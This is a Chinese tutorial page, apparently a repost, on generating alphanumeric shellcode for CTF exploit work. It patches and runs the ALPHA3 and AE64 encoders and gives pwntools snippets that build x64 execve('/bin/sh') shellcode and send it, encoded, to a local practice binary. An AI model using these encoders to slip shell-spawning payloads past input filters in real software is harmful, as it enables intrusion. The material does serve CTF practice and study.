Shellcode生成方法是什么

本篇内容介绍了"Shellcode生成方法是什么"的有关知识，在实际案例的操作过程中，不少人都会遇到这样的困境，接下来就让小编带领大家学习一下如何处理这些情况吧！希望大家仔细阅读，能够学有所成！

alpha3

这个工具源码在google上，国内可以选择从github下载。不过官方代码在Linux环境下运行时有些问题：

% python ALPHA3.pyTraceback (most recent call last):  File "ALPHA3.py", line 4, in import charsets, encode, io  File "/home/taqini/ctf_tools/alpha3/encode.py", line 1, in import ALPHA3  File "/home/taqini/ctf_tools/alpha3/ALPHA3.py", line 5, in import x86, x64, test  File "/home/taqini/ctf_tools/alpha3/test/__init__.py", line 25, in raise OSError("Unsupported platform for testing.");OSError: Unsupported platform for testing.

看下报错信息，发现错误在test/__init__.py中，打开源码，发现有个判断平台的代码，如果不是win32就报错，解决方法很简单，只需要把后两行代码注释掉就行，修改如下：

if (sys.platform == 'win32'):    # ...    TEST_SHELLCODE_OUTPUT = "Hello, world!\r\n"#else:#  raise OSError("Unsupported platform for testing.");

再次运行就正常：

% python ALPHA3.py____________________________________________________________________________      ,sSSs,,s,  ,sSSSs,    ALPHA3 - Alphanumeric shellcode encoder.     dS"  Y$P"  YS"  ,SY    Version 1.0 alpha    iS'   dY       ssS"     Copyright (C) 2003-2009 by SkyLined.    YS,  dSb   SP,  ;SP     `"YSS'"S'  "YSSSY"      http://skypher.com/wiki/index.php/ALPHA3____________________________________________________________________________[Usage]  ALPHA3.py  [ encoder settings | I/O settings | flags ]# ...

修改完之后还需要编译源码，但是编译源码的工具也在google上，如果懒得自己编译，可以直接下载我修改版: https://github.com/TaQini/alpha3

git clone https://github.com/TaQini/alpha3.git

生成shellcode

from pwn import *context.arch='amd64'sc = shellcraft.sh()print asm(sc)

将上述代码保存成sc.py放到alpha3目录下，然后执行如下命令生成待编码的shellcode文件

python sc.py > shellcode

默认生成的是x64的sys_execve("/bin/sh",0,0)，可以修改成其他的arch或shellcode

x64 alpha编码

生成x64 alpha shellcode

python ./ALPHA3.py x64 ascii mixedcase rax --input="shellcode"

或者用我写的脚本：

./shellcode_x64.sh rax

其中输入文件为shellcode，rax是用于编码的寄存器(shellcode基址)

比如有如下代码：

  00101246 48 8d     LEA    RAX,[RBP + -0x410]           85 f0            fb ff   0010124d ff d0     CALL   RAX  ; ...

通过call rax跳转到shellcode，那么alpha3命令中用于编码的寄存器就是rax

shellcode的起始地址存在哪个寄存器中，用于编码的寄存器就是哪个

x86 alpha编码

alpha3中x64的shellcode只要上述mixedcase一种情况，x86的选项比较多：

x86 ascii uppercase (数字+大写字母)

x86 ascii lowercase (数字+小写字母)

x86 ascii mixedcase (数字+大小写字母)

用法与x64相似，不赘述啦~

全部编码方式

alpha3支持的所有编码方式如下：

Valid base address examples for each encoder, ordered by encoder settings,are:[x64 ascii mixedcase]  AscMix (r64)              RAX RCX RDX RBX RSP RBP RSI RDI[x86 ascii lowercase]  AscLow 0x30 (rm32)        ECX EDX EBX[x86 ascii mixedcase]  AscMix 0x30 (rm32)        EAX ECX EDX EBX ESP EBP ESI EDI [EAX] [ECX]                            [EDX] [EBX] [ESP] [EBP] [ESI] [EDI] [ESP-4]                            ECX+2 ESI+4 ESI+8  AscMix 0x30 (i32)         (address)  AscMix Countslide (rm32)  countslide:EAX+offset~uncertainty                            countslide:EBX+offset~uncertainty                            countslide:ECX+offset~uncertainty                            countslide:EDX+offset~uncertainty                            countslide:ESI+offset~uncertainty                            countslide:EDI+offset~uncertainty  AscMix Countslide (i32)   countslide:address~uncertainty  AscMix SEH GetPC (XPsp3)  seh_getpc_xpsp3[x86 ascii uppercase]  AscUpp 0x30 (rm32)        EAX ECX EDX EBX ESP EBP ESI EDI [EAX] [ECX]                            [EDX] [EBX] [ESP] [EBP] [ESI] [EDI][x86 latin-1 mixedcase]  Latin1Mix CALL GetPC      call[x86 utf-16 uppercase]  UniUpper 0x10 (rm32)      EAX ECX EDX EBX ESP EBP ESI EDI [EAX] [ECX]                            [EDX] [EBX] [ESP] [EBP] [ESI] [EDI]

AE64

AE64是杭电的一位大师傅写的工具，专用于生成64位的aplha shellcode。下载方式：

git clone https://github.com/veritas501/ae64.git

AE64的优势在于编码时可以更加灵活地使用寄存器，但是生成的alpha shellcode比alpha3要更长一些。

此外AE64是python写的，可以直接在python中调用，以下是官方的栗子：

from pwn import *from ae64 import AE64context.log_level = 'debug'context.arch = 'amd64'p = process('./example1')obj = AE64()sc = obj.encode(asm(shellcraft.sh()),'r13')p.sendline(sc)p.interactive()

"Shellcode生成方法是什么"的内容就介绍到这里了，感谢大家的阅读。如果想了解更多行业相关的知识可以关注网站，小编将为大家输出更多高质量的实用文章！